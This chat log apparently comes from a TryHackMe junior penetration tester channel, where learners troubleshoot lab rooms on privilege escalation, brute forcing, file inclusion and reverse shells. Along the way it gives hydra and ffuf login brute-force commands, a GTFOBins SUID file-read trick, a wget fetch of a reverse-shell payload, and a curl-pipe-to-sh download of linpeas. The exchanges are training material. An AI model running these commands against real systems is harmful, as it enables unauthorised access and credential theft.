#junior-pentester-path
hi, in the “Walking an application” room, in the documentation I found the ||/thm-framework-login|| path, logged in with default creds and got a flag. Is this a bonus one? Is this flag required anywhere else in the room?
nm, this is the answer for the next room's task
hi, in the cross site scripting room, task 8 (practical example), I am not getting any responses in my netcat listener, but the same is working fine with the thm request catcher. Can anyone please tell what is wrong?
Hi guys, why isn't the search -f *.txt on the meterpreter session coming back with anything, or does it take a while please?
Ignore that, it just takes a while to search, sorry lol
Struggling to create a 500 internal error on the Burp Suite: Repeater room
Any ideas guys?
Did you read the hint?
yeah
And did you try all of these hints already?
yes
Then I guess you should have already received a 500 error. So what numbers, for example, have you tried?
What about the part of the hint saying "or a number less than or equal to 0." ?
Completed this path tonight!
Windows stuff is hard!
I'm stuck on task 5 of Linux PrivEsc. The exploit code won't compile
https://www.exploit-db.com/exploits/37292 this is the exploit
Are you sure it didn't compile?
Warnings and errors are different; warnings don't prevent it from compiling
oh
not a programmer
so it all looks like it's saying "This isn't going to work" to me
You'll see warnings and errors quite a lot in sec, it's important to remember the difference IMO
thanks @idle bison
Gave +1 Rep to @idle bison
now I'm getting permission denied when I try to transfer my exploit to the victim machine
@idle bison
HTTP request sent, awaiting response... 200 OK
Length: 17112 (17K) [application/octet-stream]
exploit: Permission denied
Cannot write to ‘exploit’ (Permission denied).
Task 5?
yeah
What directory are you in when you wget?
Gave +1 Rep to @delicate tide
I can't progress any further in Linux PrivEsc
stuck on task 7
user doesn't have access to sudo at all
Not sure how I'm supposed to even do that task
If you were able to use sudo, there would be basically no point in trying to escalate your privileges
but the exploits require sudo
What exploit are you talking about?
the GTFObins
But as I said, if you were able to use sudo, you could do everything on the system anyway
So if you have to use sudo, you are doing something wrong
As you are not allowed to use sudo, the sudo part of that gtfobins page doesn't apply to your scenario. I highly assume you found that binary by searching for the SUID bit, so you have to use that part of gtfobins
Yes because the SUID bit is what this task focuses on
Right, so I'm not sure why you would have to use sudo?
Are you talking about that part? sudo install -m =xs $(which base64) .
yes
The description says: "To interact with an existing SUID binary skip the first command and run the program using its original path."
So you can just skip that first command.
I feel really stupid and I have no idea what to do now
So as you can skip the first command, there are only 2 commands left.
LFILE=file_to_read
./base64 "$LFILE" | base64 --decode
So the first one of these 2 is just assigning a file path to a variable, e.g. LFILE=/home/karen/flag.txt
The second command executes the base64 binary, encodes the contents of the file you specified in the LFILE variable, pipes it again to base64 and decodes it, so that the contents get printed out for you.
So basically you can read files you shouldn't have read access to
thanks @shadow echo I was able to get the flag. Now I just need to unshadow the password
Gave +1 Rep to @shadow echo
I think I got the password unshadowed but I don't know which part is the password hash
wait. no I didn't
why didn't unshadow work?
ok, unshadow seems to have worked but I can't crack the password even though john cracks the two other hashes in the file
grrrr nevermind I got it
Ok, I'm on task 8 of Linux PrivEsc and I'm not sure what I'm doing wrong. I've edited the script to open a reverse shell on port 6666 and I set netcat to listen on that port, and nothing.
Task 8 or 9?
I mean 9
Check the permissions of that script file
@shadow echo thanks
Gave +1 Rep to @shadow echo
I'm clueless as to what to do for 10.
got it
Folks, in the metasploit exploitation room, one of the questions asks what is running on port 8000
I used nmap to answer this question. I see the hint given is to use the http_version module.
I understand we are asked to use the http_version module given that a web server is running on the target port.
But what if some other app is using that port? Is any generic metasploit module available to identify what is running on a port?
Why wouldn't it be able to do HTTPS?
There's an option to negotiate SSL so it does support it
anyone know how to change the default terminal view from this
well, it's not letting me upload a file.
trying to have the terminal prompt all on 1 line and not 2
┌──(kali㉿kali)-[~]
└─$
trying to have it all on one line
what kali version are you using? @barren lintel
2021.4
I am assuming that the 2 lines have come by default since the 2020 version.
try changing your shell, see if that works.
I will try to research and let you know if I find anything
yeah, tried that. In my OSCP learning PDF they say to run C + END
but that doesn't work, nor do I know how that would ever work, as that would just type out a boat load of CCCCCCCCCCCCC
have a look at this https://superuser.com/questions/1603642/how-to-revert-to-one-line-terminal-in-new-kali-linux-2020-04
@barren lintel
@dark cedar @barren lintel Better than editing the file, try kali-tweaks
sure, will check
thanks @idle bison
Gave +1 Rep to @idle bison
Can anyone tell me how I can pass Cloudflare verification for an XSS vulnerability?
I'm unsure what exactly you mean?
capstone room is slow
Thanks for the links. Just edited line 115 to have "oneline" and it's now back
Gave +1 Rep to @idle bison
PROMPT_ALTERNATIVE=oneline
NEWLINE_BEFORE_PROMPT=yes
I am doing this for bug bounty. Can you help me with that?
I tried this too and had the same problem. I've seen other walkthroughs add a referer path but we haven't learnt this method. I'll have to do a curl request too, but I would like to know how this can actually be done in burp
Hello, trying the File Inclusion room, task 8, question number 2 (/etc/flag2). It shows the message "Refresh the page please!" and does not appear to work on Firefox (don't know if it is my browser); tried on Chrome and the message changed and I received the flag. Just in case anyone is having the same problem
how do I transfer files to a remote desktop instance?
let me rephrase: how do I share files with a remote desktop session?
Using rdp, click Show Options, go to the Local Resources tab and click More. From there expand the drives and pick the drive you want to share files from
@civic kestrel I don't see any options
there should be a show options button on the bottom left when you open remote desktop connection
the one that comes with kali doesn't have options
my bad I thought you were using windows
Hey everyone, in the File Inclusion room, Task 4, Question 1. I am constructing the URL to reach the /etc/passwd file. So far (I think) this is correct: /****.php?file=?etc/passwd but I can't figure out the first four digits after the start
/* ** *.php?file=etc/passwd
Wait nevermind I figured it out
@civic kestrel thanks anyways
Gave +1 Rep to @civic kestrel
@pearl sage Isn't it great when that happens?
lmao yes
freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
@civic kestrel
are you sure you have the right IP address and the port is not blocked?
I figured it out. I wasn't connected to the tryhackme vpn
still can't share files
got it working
I did it! I completed the Jr. Penetration Tester path!
hey
I'm playing around with sublist3r for domain enumeration. Anyone know what the brute force switch does with that tool? The help pages don't provide any data, nor does the github
Does anyone have any tips on the File Inclusion challenge for flag 3? I've found 2 CVEs linked to it but somehow can't find a way to exploit it
you've tried amass?
For flag 3, to get it you have to apply a combination of request method and filter bypass.
Hmm... I thought about somehow manipulating the session by passing some values in the PHPSESSID or setting a cookie and then invoking it with the parameter, but it didn't work... Those are the two CVEs I've stumbled across: CVE-2011-2505, CVE-2010-3065. Can they be of any use?
Well actually it's pretty straightforward. Check out the task about filter bypass/getting rid of the file extension again and just try a "normal" file inclusion with the correct request method and you should be fine. So no need to look for any CVE whatsoever
Thank you sir!
Gave +1 Rep to @shadow echo
I've solved it, but noticed something. My request was absolutely the same in burp and in the terminal where I curl-ed. I usually do everything with burp, but when I tried with curl it worked. I think it's a bug.
No, I guess it's most likely due to curl adding a specific header when defining the request method, whereas burp only captures the request you make in your browser, and you either didn't manually add that header on your own or didn't specify the correct request method in your browser in the first place.
sup, can anyone help me with file inclusion task 4, 2nd question
pls
You should ask the question you have with that task straight away
where am I supposed to find the answer
In lab 2 of the target machine's webpage
You'll find the answer in the error message in lab 2
So you found it now, right?
Hey, just wondering, I'm on the Auth Bypass page, on Task 3 brute force. I'm putting in the command I need to but not getting any results, any ideas?
Check your valid_usernames file. It's only supposed to have the usernames in it and not any extra strings like status codes, size etc.
yeah I thought that, so I checked it and edited it
And still not working?
or do they have to be on the same line with commas?
I just put them on separate lines because that's what the password ones are like
No they don't. So I assume it's still not working. Then create a new file with touch filename and write the usernames in it manually, so as not to have the output file from ffuf anymore.
i'll give it a try
is it
touch Admin Simon Robert Steve valid_usernames.txt
lmao nevermind i realised
What? No ^^
that makes the files
Ye
so I just made 5 files lmfao
sorry, nooby
so touch valid_usernames.txt
then open and put the names in myself
Yes, did you delete the previous valid_usernames.txt file?
yeah
Ok
I think it's because ffuf for some reason is not outputting the file in the correct format. Need to check on that myself to fully understand.
thanks for the info!
I have not, but I did see TCM talking about it so I'll give it a shot
yep, thx
Gave +1 Rep to @shadow echo
Thank you for answering these questions 🙂 i was having the exact same problem.
Got mine to work as well using your directions ❤️
What's the best number of tasks to use to speed up hydra brute forcing?
would guess increasing threads could increase hydra speed
but there are limits there too
ah yeah, the default is 16 tasks/threads; increasing that to say 32 would increase the speed but might also get you detected quicker and therefore make you appear quicker on the denylist, making you unable to continue your attack... you could also mess with the -w time flag/parameter/option to increase speed by not waiting as long for a response all the time
the best numbers will vary between targets
Too many threads can also cause context thrashing on your VM or host. Don't run more threads than you have cores you are willing to dedicate to it.
Most of the time spent in hydra is waiting for network stuff to happen, as far as I can tell. Increasing threads doesn't necessarily help with that if the blocker isn't # of simultaneous connections.
I'm just trying to optimize for the particular task I am doing. I'm on the netsec challenge in the junior path
guys, I'm trying to do the linux privesc kernel exploit part
Lmao nevermind! I was using the wrong port in the URL to fetch the exploit binary 😛
GG
hey guys, I'm doing an assignment for uni, and I have to crack the password of a pdf using some documents as the wordlist, but when I use john the ripper to get the hash of the file it returns the path of the file instead of the hash. Is it possible to get some help here?
"./pdf2john.pl /media/sf_DFF_Case_Files/sellerZ.pdf > /home/kali/Desktop/password.txt", this is the command I'm using, and this is what I get as a reply: /media/sf_DFF_Case_Files/sellerZ.pdf:
do you guys know any good way of doing this?
To not leave you without an answer.
You probably didn't receive a reply because it has nothing to do with a thm room/path and also because of that: #room-help message
hey people
I am trying to use hydra:
hydra -v -l admin -P ~/Downloads/rockyou.txt **** http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login&return=bW5kZXgucGhw&13143b50d76bf4f81c8e03165a6db4ac=1:Login Failed"
But the output is always like this
[80][http-post-form] host: **** login: admin password: 12345678
[80][http-post-form] host: **** login: admin password: babygirl
[80][http-post-form] host: **** login: admin password: lovely
[STATUS] attack finished for ****(waiting for children to complete tests)
[80][http-post-form] host: **** login: admin password: nicole
....
....
1 of 1 target successfully completed, 16 valid passwords found
am I doing something wrong?
This is Daily Bugle task.
Did you check what the actual login request on that page looks like? So by capturing that request with burp, for example?
yup
and there is also a Cookie: header, but should I include that in the hydra? I guess it is optional, and it is not in the data section
Could you show a screenshot of that captured request in burp pls?
sure
Well, I guess you could try to include that cookie, yes
Or delete that cookie in burp to see what response you get
Also, maybe try turning down the threads in hydra, to like 4 and check again if it's working
ohh, nice, when I deleted the cookie I got the 400 error
noh.. same
[80][http-post-form] host: **** login: admin
[STATUS] attack finished for **** (waiting for children to complete tests)
[80][http-post-form] host: **** login: admin password: 123456
[80][http-post-form] host: **** login: admin password: 12345
[80][http-post-form] host: **** login: admin password: 123456789
1 of 1 target successfully completed, 4 valid passwords found
request:
hydra -v -t 4 -l admin -P ~/Downloads/rockyou.txt **** http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login&return=aW5kZXgucGhw&07f73be725d051c2b68db5ee7ee77f45=1:Login Failed:H=Cookie:2b01af51830ca9615359108de04d9ca1=2tpnmp3m6bqng0cce3kfoup9i4"
Mh, I would have to try it on my own as I'm not sure why it is like that. Or maybe try checking a writeup for that part of that room
@craggy shoal what room is this?
Daily Bugle
and sql injection room done
Hi everyone. 🙂 Do you know if Dirbuster is still a current tool? SourceForge mentions it was last updated in 2013 but it is still installed in Kali apparently. 🤔
Granted, but the question was really: is this thing still… a thing?
By the looks of it not really
Their gitlab stuff has barely been updated
A lot of the lists are 9 years old with no updates
did anyone else have issues with nmap not working correctly for advanced port scans? I keep having issues showing unfiltered and open|filtered ports
specifically in their own kali machine using openVPN
I can get it to work on attack box
yes, not really sure what the problem is, but it looks like it's very slow when I did it with VM kali + openvpn. Maybe the internet is not fast enough?
me too
no, my issue is that it would just show zero results for -sF scans
but in the attack box I would get the proper ports returned
sorry, but under what circumstances do you need the -sF scan?
Advanced port scans tasks in the nmap section of junior pentester
did you try appending --reason? to see why it returned 0 results?
worst case, just changing your openvpn IP might help you
I might have used --reason incorrectly because it doesn't show anything different than without --reason. Maybe these screenshots will help. I just want to make sure I'm not doing something wrong or that I don't have something configured incorrectly. The VPN is connected, I can ping that same machine. I'm guessing the ignored states message is a clue but I don't really get great info if I google the problem
Can I try to scan your target machine too? As you should get the same results on your own machine as on the attackbox
try to scan your machine sudo nmap -sF 10.10.183.100 1 ✘
[sudo] password for landax:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-31 22:21 WIB
Nmap scan report for 10.10.183.100
Host is up (0.40s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
53/tcp open|filtered domain
80/tcp open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
Nmap done: 1 IP address (1 host up) scanned in 39.22 seconds
yes go for it, it's up
You scanned the machine without asking him first ^^?
my bad, just trying to help him. but sorry, I can't
Okay, got the same results as landax and it works just fine. So are you on your local machine right now?
yes I have a VMware with my own kali, VPN connected and working. I can ping the target machine
If you check ip a s, do you only see a tun0 interface or any extra like tun1, tun2 etc.?
I have never used this before so I hope I give you the correct info back. I see three results. One looks like localhost, 2 looks like my ethernet, 3 is probably my kasm docker because it says "docker0"? Not seeing anything that says tun0. Another aspect of this problem that I should mention is that some nmap scans do work on the target machines. I didn't have any issues when I did the basic scans like -sT
I sense the magic one liner : sudo ip link set dev tun0 mtu 1200 incoming 👀 I've seen this setup before 😄
So that means you are running openvpn on your host machine instead of directly inside your VM?
yes, that's correct
Then that's the issue, you have to run it directly inside your VM. So not on your host machine and also not on your host machine and the VM simultaneously 🙂
Well, seems like not this time 😄
that makes sense! I will work on getting this set up correctly. Thank you SO MUCH! I really appreciate your help 🤜
Gave +1 Rep to @shadow echo
uh you're the man
Ayee just finished the Jr pentester path :))
cross posting this from hints channel to see if anyone knows:
I'm stuck on something in https://tryhackme.com/room/linprivesc probably simple
in the walkthroughs, when it gets to exploit-db everyone seems to be pulling a .c file straight from exploitdb, but when I check it's just a .TXT of instructions
either they're not showing a conversion of some kind that happened before writing or making the video or I just don't know how to do it
What task?
Can you verify and share a screenshot please?
!docs verify
Sorry, I meant to reply I got an answer. It was Task 5, I didn't realize formats on Exploit DB were split into multiple pages, so there was a different search result for the same exploit that had a .c download
🔥 Good work!
and I'm verified now, thanks
You're welcome!
Hello, I am trying to complete the subdomain enumeration module and I am on the virtual hosts section. It gives you the script to run, but when I run it, I'm not finding the two domains it wants me to. It just scrubs them all and ends. Am I just a moron?
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host:FUZZ.acmeitsupport.thm" -u http://10.10.146.173 -fs 472
It did the same thing, burned through the wordlist and didn't return any subdomains.
standby
No I do not. However, that wasn't in the lesson to add it so I didn't
No, which makes me wonder if my attackbox is acting silly.
Whenever a room mentions a hostname as the target rather than an IP, it's a safe assumption you have to add that hostname to /etc/hosts. Most of the time it'll tell you to add it to hosts, but if you're anything like me you'll usually miss that piece of information. 😂
I can reach google and everything else I have needed to open though.
Ok, I can do that 😂
Will do
I'm evidently still doing something wrong. I added the acmeitsupport to /etc/hosts, but still not getting anything.
Ok, verified. It might just be I didn't add the acmeitsupport.thm correctly in the hosts file. I've just really started messing with this.
Can you ping the domain or access it in your browser now?
Like I said, I know this is me doing something like an idiot. I tried ping acmeitsupport.thm, but it didn't do anything. Is it different than pinging an ip address?
the entry should look like this: <IP> acmeitsupport.thm. Make sure it starts on a new line.
I figured I was entering it wrong. I guess getting the IP for acmeitsupport.thm is the issue I am running into right now. I feel like this is becoming way more complicated than a simple subdomain enumeration exercise.
I tried that, but that's the IP for my attackbox isn't it?
I'm looking for an IP for the target, but I didn't see one.
I clicked it but it said I could only have 3 machines open at a time. It's not giving me that bar with the information like it did on the last module. I might just try signing out and back in to clear things out.
Where is it hiding the other two boxes? In the previous lessons?
I found them, didn't realize it wasn't just carrying the machine over from one to the next. I bet THAT is the reason it cannot find it in this module. Good to know for the future.
Like I said, I knew it was me doing something dumb.
Always learning at least.
Thank you, you guys are awesome.
Finished it by the way once I had the target machine for the module actually running. Bet I don't make that mistake again. 😂
Hi everyone. 🙂 I'm getting familiar with Dirb and experimented with sending Dirb's traffic through Burp Proxy using the -p flag. This works fine, but in Burp Proxy's Intercept tab it seems I need to click the Forward button individually for every request sent by Dirb. Is there a way to 'Auto Forward'? Doing it by hand is just impractical.
Disable intercept?
Works great. Thanks! 👍
Hiii! For Authentication Bypass / Cookie Tampering, is there a specific way the lesson would like us to do the base64 hash decoding / encoding? Reading back through I can't really tell if there's a recommended method.
I just used base64decode.org...
Well, actually base64decode.org is even in the hint, so that's perfectly fine. But you can decode / encode it with whatever works for you. Cyberchef for example is a great tool in general, in case you never used it before. https://gchq.github.io/CyberChef/
Hah, no way! I should've looked at the hint for sure. Good, I'm glad that I was mostly on the right track… I thought there maybe should have been a way for me to do that with the /test-cookie page but I gave up after a few tries.
Good call on CyberChef, that was recommended/used in one of the tasks in one of the fundamentals rooms I think. I need to dig into it further, thanks!
Gave +1 Rep to @shadow echo
Very very very important. Base64 is not a hash.
That's a great point and clarification. We just refer to the base64 encoded string as... "a base64 encoded string" then?
Base64 encoded data, yeah.
hows everyone doing
What command would you use to clear a set payload in metasploit? i forgor💀
good, what abt you
good spending the night doing THM rooms in between playing some CS lol
In CS are you silver or gold
not sure if I'm in the right room, but any idea if I could run a slow gobuster scan for discovering locations and evade a WAF?
members, I ran this command and it gave me this error
I'm unsure what part of that screenshot you mean as an error?
Hey guys, I hope that you all are well
I'm new to the cyber security stuff and I need more resources to learn this stuff
I am currently learning from try hack me and hack the box but they are not completely free
Can someone guide me more please?
About 80% of the THM rooms are free. So I think you should have a lot to learn before running out of rooms 🙂
If the next room in your Learning path is subscriber only, it doesn't mean the rest of them are as well. Skip the subscriber ones and do the free ones. You can learn a lot with a free account. Keep grinding!
Okiee thankss
morning everyone
this is a channel for one of the learning paths from the website https://tryhackme.com
@crisp wadi ⬆️
hi all, I'm stuck on the windows privesc room. Task 2 is to rdp on to the machine and check what users are there etc, except there are no login creds, and researching the default for the setup used as hinted in task 1 gives no joy. Am I looking at this wrong?
Show split view 🙂
wow thank you! after all the hair I have just pulled out 
Gave +1 Rep to @maiden stratus
It is still showing this
Even though I started the machine in the room "Authentication Bypass"
Is this your VM browser?
No, it's my host machine
I'm using the in-built Kali machine
ah, you're using the attack box, right?
yeah
Solved it in the meantime?
In the windows privesc room, isn't there any other way to switch to user "jack"?
rather than logout and login, just a simple switch like su in linux
I actually started the website using this room
and then started solving the contents of this "Authentication Bypass room"
Got this one
The solution was to use this
Instead of this
Sorry for pinging about this
Well, to me this all looks like you are not on the web based attackbox or kali machine. So it seems you are trying to access this target machine via your own machine. And the reason you can access the site with thmlabs.com is that you don't need to be connected via the thm vpn to access it. But for the IP based url you will have to be connected to the thm vpn
umm yeah, something like this... sorry I don't know much about this
😓
If you want to go through the room from your own machine, connect to the thm vpn and you are fine. This room shows you how to connect: https://tryhackme.com/room/openvpn
gtg now; in case you still have issues, reach out again in this channel
ohh ok thank you
I have a question on the command injection practical. I can't get any response from the machine, and I'm guessing it's because I'm inputting the commands incorrectly. Is there a particular syntax I'm supposed to use? The reading material is not very clear
That was nice to receive 🙂
Congrats! @lone berry
Cheers it was a good path that, really enjoyed it
Hello 😀 I am on the msfvenom section. I have used wget to transfer my payload to the ssh session machine. And now I'm trying to get a session on my attacking machine but it keeps telling me no session created. Am I supposed to activate the payload on the ssh machine first?
Attacking Machine
SSH machine
Appreciate any help, I've been stuck on this all day.
@steel nymph hello
I have restarted the attackbox and tried this over and over again.
OK. I just don't see how it is in use LOL. OK thanks so much for your time.
@steel nymph So it looks like 7777 is in use and 4747 is not in use?
OK thanks again! I will try to do it again with 4747 and let you know how I go :)
Trying to figure out why this crontab script isn't working on the Linux PrivEsc task
I've configured the script and the listener to the same port
Is it executable?
I'm an idiot 
Hi, anybody that can help me out with this? When I do the content discovery room I can't access the sitemap.xml page, but I can read the robots.txt just fine. Any ideas?
What's the error you get?
No specific error, it just hangs, both in firefox and with curl
Hmm
I tried it and it works. What address are you typing in?
Might be issues with the box itself. Try terminating and rebooting the box
Alright, already done that. In the meantime I'm gonna reboot my vm too
Yeah same problem: command: curl http://10.10.70.124/sitemap.xml
weird stuff
Error: error on running gobuster: unable to connect to http://10.10.70.124/: Get "http://10.10.70.124/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
A more complete error when running gobuster
Congrats!!! It's a lot of work!!!
@steel nymph thanks a lot! Got there in the end and completed the room👍
Gave +1 Rep to @steel nymph
Guys, has anyone had issues with the linux privesc CRON task? I swear I got the script being run under cron OK, the correct IP and port to establish the connection and the listener on the attacker host listening on the right port yet I'm not getting the reverse shell.
It's supposed to run every minute but still... haven't got anything yet.
Check the permissions of the script you edited.
Thanks! (Deleted the ayy lmao meme. Too big. Better leave the youtube song: https://www.youtube.com/watch?v=4vkR1G_DUVc)
Gave +1 Rep to @shadow echo
It seems to be an error with the host url
You have url=http:/10.10.31.108/:8881
With only 1 / after the http
Try using 2 //
http://host-ip:port
Hey guys, I am working through the Authentication Bypass segment in the JR Pentesting learning path. I'm stuck on the bruteforcing with ffuf bit; when I run the command with the valid_usernames.txt I'm not getting any output. Should it be outputting to the terminal window or a file?
I just seem to get no output at all
is the valid_usernames.txt a couple of usernames separated by new lines????
@sage current
Is this a manually created file, or did you just edit (removed all the status codes, size, etc.) the output file that ffuf created?
Hey guys, I've started the "Walking An Application" room, and for some reason I can't reach the "acmeitsupportv10" website. Maybe someone knows the possible reason? (via openvpn)
@inner python Did you try using the IP address rather than the url?
@inner python You can also use the https://x-x-x-x.p.thmlabs.com that is shown in task 1 from a device not connected to vpn.
@warm crypt Well done. I finished the "Complete Beginner" path on 30 January and am up to 26% here. If it weren't for classes for a degree I'm paying much more for, I figure I could finish this in a month or two.
ohh thanks, sorry I didn't notice this
@inner python I'm sorry if you had already tried that. I fired up the machine again and was able to get to both the url I referenced from a non-vpn'd instance and to the website by using the IP address directly on VPN.
Sometimes it's an issue with the VM as well
If I run into an issue I'll usually boot up a new instance of the VM or restart my kali VM
@warm crypt Very true. I'm prone to banging my head against a problem for way too long before I take that step.
Worth checking the status of the openvpn session in your terminal
If it's changed from Initialization Sequence Completed, try running the openvpn script again
@inner python
it's working with the link from the first task, thanks 🙂
Cool
I'm trying to execute this .elf that I msfvenom'd to get a rev tcp. What am I doing wrong?
Set your payload in multi handler correctly and it should work
is that what 'segmentation fault core dumped' means?
Not directly.
Hello, I'm trying to finish up the privilege escalation sudo block. It tells you to get the hash of frank's pwd. I got it, but it's saying the answer is wrong. It matches the format displayed, so I am not sure if I am just stupid.
standby
It says frank in the question
Every time I dump the hash in a decoder it tells me it is an invalid hash. I'm assuming I am doing something just slightly wrong.
||$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1||
Is it saying "Wrong answer" or "undefined"?
wrong answer
lol ok
Haha, ok it took it that time
Next time I am sure I am right, hit refresh and try again.
At least I had the right answer. Great success in learning.
Please put answers into spoiler tags
Sorry juun, I will make sure I don't screw that up in the future.
No worries, just don't want someone who wants help getting an answer they didn't want
From what I am seeing doing extra research, the hashes you can get, are those pretty hard to actually reverse? I know that it seems like I'm asking a lot of questions about what specific users' pwds are, but the research I have seen basically says that outside of using John, it isn't something you can just dump into a decoder and get the plain text from.
I'm obviously new at this, so looking for any good extra stuff to read to improve the knowledge base.
You can, theoretically, dump any hash into a brute force tool and get a plaintext answer
and tools like jtr and hashcat aren't decoders; there is nothing to reverse
do you know what a hash is, and how it differs from an encryption or encoding?
Vaguely, a hash is basically a 1 way randomization of the plain text. Encoding is basically using a set algorithm to change plain text in a way that can be easily decrypted by the proper user.
I have tried dumping the hashes into a few online tools, but none of them have actually spit out a plain text. That's why I figured that what I am getting for these user hashed passwords are something I am missing the point on for turning them into a plain text answer.
Ok, that makes sense.
it's not really a randomization. a hash applies the same transformation every time, regardless of input. That's how you can store a hash to verify a correct password
I'm doing lots of side learning during this part. Up till now, it seemed like the path kind of walked you through the tools and things you needed to get through things. This has been the only part that seemed to kind of deviate and I am a little lost on using what needs to be done. Yah, I saw in the file where it told me what kind it was. Just wasn't completely sure what to do with that afterwards.
john is also very slow to brute that type of hash, if you have a host with a decent GPU, you can run hashcat in windows to speed it up
it'll still take a much more significant amount of time than any of the toy examples, such as NTLM or SHA1
Ok, i'll keep plugging away at it!
Juun, thanks for the explanation on that stuff btw. It cleared some things up for me that I was trying to draw the lines to in my head. I ran a hash through john and doing a single one like that it completed in about 10 seconds and spit out the answer.
Gave +1 Rep to @slate sinew
anyone know why this ffuf command is not returning any results for me from the authentication bypass room?
Already confirmed the uname/pass I'm looking for is in the verbose output from ffuf if I remove the filters, but it's returning a 200 HTTP status code, whereas if I narrow it down to this it returns a 302 status code...
check your directories for both valid_usernames.txt and your wordlist location.
Make sure you're launching the command from the same directory where valid_usernames is.
make sure you input the usernames in the file properly, so no extra spaces or anything, each username needs to be on its own line.
to check your path for the wordlist just do locate 10-million-password-list-top-100.txt for easy confirmation
Even your adjusted syntax should work perfectly fine. I can't see any errors in it.
@lapis lake That's the thing that's driving me nuts here. That's the output I'm getting... it's checking both wordlists against each other. The output in the pic is the answer but for some reason it's returning a 200 status... but if I just run it with one wordlist against like this-
ffuf -w /usr/share/seclists/Passwords/xato-net-10-million-passwords-100.txt -X POST -d "username={correctUserNameHere}&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://{targetIP}/customers/login -fc 200... it will return a 302 status. letting me know its fuzzed the correct pass
ffuf result when i just put in each username one at a time against a password list
well 302 is a redirect, so after posting both correct credentials it's only natural you'd get 302, since your method is POST.
I'm not an expert in this, but in my mind, 200 code is used to check which brute force attempt is correct, so it goes through names till 200 is found then goes through password for 200, when both are A-OK, it logs you in, which results in a 302
I'm sure someone can explain it better than my ooga booga brain. 😂
I guess the problem is that I can't seem to get it to POST both correct credentials when I try to run it with 2 wordlists. Not a big deal in a THM room when you only have 5 usernames to cycle through, but would be incredibly tedious in a real life scenario when you might have to run 1000s of users against a much larger password list
Anything with a 200 status return is useless to me here because everything you send it returns 200 even if it's the wrong credentials. The -fc 200 is to filter those results out because the redirect is what I'm looking for to tell me I found the right credentials. No worries though, if anyone has a clarification for me that'd be dope, but probably just going to work with another fuzzing script and move on
Did you create the valid usernames file on your own, or is it the file you received as output from the previous task ?
output from the previous task
Create a new file with touch new_valid_usernames and then manually write the usernames in it by hand
@shadow echo got it to do what I wanted finally. Thanks, I pretty much restarted the room and the machine. Messed around with wfuzz for a while too but I don't like it as much, doesn't accept as many args and the output is messy
Gave +1 Rep to @shadow echo
So you didn't get it to work with the manually created usernames file in ffuf ?
@shadow echo not at first but I think the machine I spun up for the room was acting up. I termed it, deleted all the other txt files I made and basically restarted from that step. I wrote the unames in mousepad manually and ran ffuf again because idk... when I used nano or touch to make the txt file it wasn't running anything but the last uname in the list
Alrighty
but yeah it was helpful thanks.
Hi everyone, sorry to ask but can't find how this works 😦
Basically I've done the Jr Pentester path a few weeks ago but lately I've seen that I could've got tickets from this path that could lead to prizes. So I went to check how many I've got but it looks like I didn't get any. I surely missed something, could someone explain to me what?
thx 🙂
Tickets were a limited time thing.
We're celebrating the release of our new Jr Penetration Tester learning path - complete a room that's part of this path and win tickets, get 3 of the same to redeem a prize. If you're a free user you can win 1 ticket, however subscribed users can win 2 tickets.
The ticket promotion ends on the 31st of October 2021
Any idea why OS detection might fail in nmap04? I guessed the right answer but running nmap ip -O I get no exact matches for the host
did you mark the script as executable
oooh
the download for the linpeas.sh is here: https://github.com/carlospolop/PEASS-ng/releases @sullen perch
the entire repo is for building the script yourself
if you want a link you can curl to download the script it would be this currently but might change later at newer releases:
https://github.com/carlospolop/PEASS-ng/releases/download/20220207/linpeas.sh
@sullen perch ⬆️ hope this helps
Alright, thx for letting me know and soz for this dumb question🙂
Gave +1 Rep to @warm crypt
It's not a dumb question, lol. Even I didn't know this until I checked the linked room
Well I read them yesterday but I may have misunderstood what it said, wish there was a french THM :p
I don't get linpeas
still can't figure out how to run
or install linpeas
I git cloned it
what's next?
you don't git clone linpeas but get it from the github releases page
or if you are looking at the readme here: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
to download linpeas locally you do:
```
# From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```
@sullen perch ⬆️
so I mounted but I can't see these files in the target machine
this is from Linux PrivEsc NFS
Iirc you're supposed to mount /backups
can you show the output of showmount -e <machine_ip>
I need help with the username enumeration with ffuf its just giving me numbers not name? I don't know what I did wrong...
I got it that you
Thanks Luma I know it was while ago you gave this advice but it help me today lol
Gave +1 Rep to @opal furnace
Hi All, running through Metasploit: Exploitation, on Task 6 the instructions are a little too vague for me to understand where and how to perform each action. I used the attacking machine to ssh into the box, I used another terminal to launch the .elf payload. but this part "use wget http://ATTACKING_10.10.129.24:9000/shell.elf to download it to the target machine" i dont understand where to perform this command (in the ssh? on the attacking terminal?) or how to edit the command so that it works (both IP's?).
Remove ATTACKING_ from that
thanks @idle bison that worked for downloading attacker to box, but when i run ./rev_shell to launch the reverse shell it says permission denied, but I am root on the box
Gave +1 Rep to @idle bison
chmod
H4CKERM4N does it again thanks @idle bison
while doing dll hijacking, my kali has turned to windows theme
idk how to go back to default kali
what??? how did this happen?
look at these, I don't like it
I wonder how it happened?
?
☹️
The first step of troubleshooting is to ask what changed, right? Can you roll back?
If you do not have a lot of settings changes, reimaging might be an option?
the problem was it switched to undercover mode automatically
i had no idea as well
its so cool
hi
when should I start doing CTFs ?
I did pre security, now in JR pentester I'm doing burp suite
I feel like I'm just learning but not practicing
I think you should. You'll probably find yourself following writeups but you'll be learning nonetheless. It's good to get your hands dirty alongside the learning paths at least in my experience so far.
You can begin to utilize the tools you've been learning about 
thanks I'll try 
Gave +1 Rep to @delicate tide
Guys, my friend and I are eager to either join or create a team, so anyone interested DM for further discussion)
